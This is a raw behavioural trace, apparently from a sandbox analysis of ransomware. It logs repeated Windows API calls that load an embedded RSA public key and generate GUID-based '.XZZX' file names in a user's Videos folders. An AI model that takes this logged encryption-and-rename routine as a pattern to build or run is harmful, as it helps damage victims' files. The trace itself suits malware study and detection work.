returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0196.598] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.598] SetErrorMode (uMode=0x1) returned 0x1 [0196.598] lstrcpyW (in: lpString1=0x2caf860, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0196.598] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x6c205eee, Data2=0xe0d1, Data3=0x4772, Data4=([0]=0xb8, [1]=0xbf, [2]=0x6a, [3]=0x11, [4]=0xe4, [5]=0x1c, [6]=0xa1, [7]=0xad))) returned 0x0 [0196.598] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\23B23FF43A95B5A94696D7543EB699F1.XZZX") returned 78 [0196.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.598] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\997DC04E3EBE14126C205EEE4188F85A.XZZX") returned 78 [0196.598] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 752 os_tid = 0xe58 [0196.756] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.756] lstrcpyW (in: lpString1=0x2caf460, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0196.756] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.756] SetErrorMode (uMode=0x1) returned 0x1 [0196.756] lstrcpyW (in: lpString1=0x2caf860, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0196.756] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x2b63dad5, Data2=0x2095, Data3=0x4a29, Data4=([0]=0xb9, [1]=0xe2, [2]=0xc9, [3]=0x0, [4]=0x7b, [5]=0x86, [6]=0xfe, [7]=0xf9))) returned 0x0 [0196.756] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned 78 [0196.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.756] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BC78FDF9097049DD2B63DAD50C3B2E25.XZZX") returned 78 [0196.756] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 753 os_tid = 0xe5c [0196.910] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.910] lstrcpyW (in: lpString1=0x2caf460, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0196.910] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.910] SetErrorMode (uMode=0x1) returned 0x1 [0196.910] lstrcpyW (in: lpString1=0x2caf860, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0196.910] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x63a03432, Data2=0x743b, Data3=0x42d1, Data4=([0]=0xa4, [1]=0x3a, [2]=0x19, [3]=0xde, [4]=0x2f, [5]=0x94, [6]=0x1a, [7]=0xf2))) returned 0x0 [0196.910] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D0384500388B9600F42B1AE33CC07A48.XZZX") returned 78 [0196.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0196.910] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8D92AF861E561A2B63A034322120FE73.XZZX") returned 78 [0196.910] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 754 os_tid = 0xe60 [0197.068] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.068] lstrcpyW (in: lpString1=0x2caf460, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0197.068] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0197.068] SetErrorMode (uMode=0x1) returned 0x1 [0197.068] lstrcpyW (in: lpString1=0x2caf860, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0197.068] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x5924d2bf, Data2=0xe802, Data3=0x4fd9, Data4=([0]=0x83, [1]=0xd4, [2]=0x87, [3]=0x10, [4]=0x15, [5]=0x92, [6]=0x1f, [7]=0x55))) returned 0x0 [0197.068] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned 78 [0197.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.068] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\1146BD7E485D47B25924D2BF4B282BFA.XZZX") returned 78 [0197.068] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 755 os_tid = 0xe64 [0197.222] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.222] lstrcpyW (in: lpString1=0x2caf460, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0197.222] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0197.222] SetErrorMode (uMode=0x1) returned 0x1 [0197.222] lstrcpyW (in: lpString1=0x2caf860, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0197.222] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x9537dbca, Data2=0x6641, Data3=0x4526, Data4=([0]=0xab, [1]=0x7, [2]=0xf8, [3]=0xaa, [4]=0x9c, [5]=0xa4, [6]=0x8e, [7]=0x4e))) returned 0x0 [0197.222] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F12649BC389976C6163CED043CCE5B0E.XZZX") returned 78 [0197.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.222] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\24C14A4A1B9EB2A69537DBCA1E6996EE.XZZX") returned 78 [0197.222] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 756 os_tid = 0xe68 [0197.380] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.380] lstrcpyW (in: lpString1=0x2caf460, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0197.380] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.380] SetErrorMode (uMode=0x1) returned 0x1 [0197.380] lstrcpyW (in: lpString1=0x2caf860, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0197.380] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x3ec34152, Data2=0x666f, Data3=0x43f5, Data4=([0]=0x83, [1]=0x58, [2]=0x43, [3]=0x9f, [4]=0x88, [5]=0x46, [6]=0x44, [7]=0xb5))) returned 0x0 [0197.380] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\02D7186C2A67434F1071035C2E882797.XZZX") returned 96 [0197.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.380] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\02AFFE8E1B31153B3EC341521DFBF983.XZZX") returned 96 [0197.380] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 757 os_tid = 0xe6c [0197.534] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.534] lstrcpyW (in: lpString1=0x2caf460, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0197.534] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.534] SetErrorMode (uMode=0x1) returned 0x1 [0197.534] lstrcpyW (in: lpString1=0x2caf860, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0197.534] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa09ddc45, Data2=0xfc01, Data3=0x4538, Data4=([0]=0xa7, [1]=0x8, [2]=0x39, [3]=0xd1, [4]=0x6f, [5]=0xcd, [6]=0x45, [7]=0x11))) returned 0x0 [0197.534] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\0790B504415F6E976181B814459452DF.XZZX") returned 96 [0197.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.534] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\0571C84544236538A09DDC4546EE4980.XZZX") returned 96 [0197.534] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 758 os_tid = 0xe70 [0197.690] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.690] lstrcpyW (in: lpString1=0x2caf460, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0197.690] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0197.690] SetErrorMode (uMode=0x1) returned 0x1 [0197.690] lstrcpyW (in: lpString1=0x2caf860, lpString2="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" | out: lpString1="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX" [0197.690] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x636c7fc8, Data2=0x51e5, Data3=0x48a4, Data4=([0]=0x8d, [1]=0xff, [2]=0x48, [3]=0x35, [4]=0x48, [5]=0x41, [6]=0x36, [7]=0xda))) returned 0x0 [0197.690] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX") returned 96 [0197.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.690] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\447C95E8173CDEB4636C7FC81A07C2FC.XZZX") returned 96 [0197.690] StrStrW (lpFirst="816AF2DA29D3EBEF5D033A6E2DF4D037.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 759 os_tid = 0xe74 [0197.849] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.849] lstrcpyW (in: lpString1=0x2caf460, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0197.849] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" 